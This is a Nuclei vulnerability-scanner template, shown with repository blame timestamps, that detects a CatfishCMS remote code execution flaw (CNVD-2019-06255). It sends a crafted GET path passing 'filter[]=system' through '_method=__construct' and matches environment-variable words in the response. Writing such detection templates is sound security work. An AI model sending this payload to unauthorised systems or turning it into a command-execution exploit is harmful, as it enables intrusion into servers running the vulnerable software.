nuclei-templates/cnvd/CNVD-2019-06255.yaml

28 lines
637 B
YAML
Raw Normal View History

2021-10-25 10:54:44 +00:00
id: CNVD-2019-06255
2021-10-26 09:52:18 +00:00
2021-10-25 10:54:44 +00:00
info:
name: CatfishCMS RCE
author: Lark-Lab
severity: medium
reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
tags: rce,cvnd,catfishcms
requests:
- method: GET
path:
- "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"
matchers-condition: and
matchers:
- type: status
status:
- 200
2021-10-25 11:19:18 +00:00
2021-10-25 10:54:44 +00:00
- type: word
2021-10-26 09:52:18 +00:00
condition: and
2021-10-25 10:54:44 +00:00
words:
- 'OS'
- 'PATH'
- 'SHELL'
- 'USER'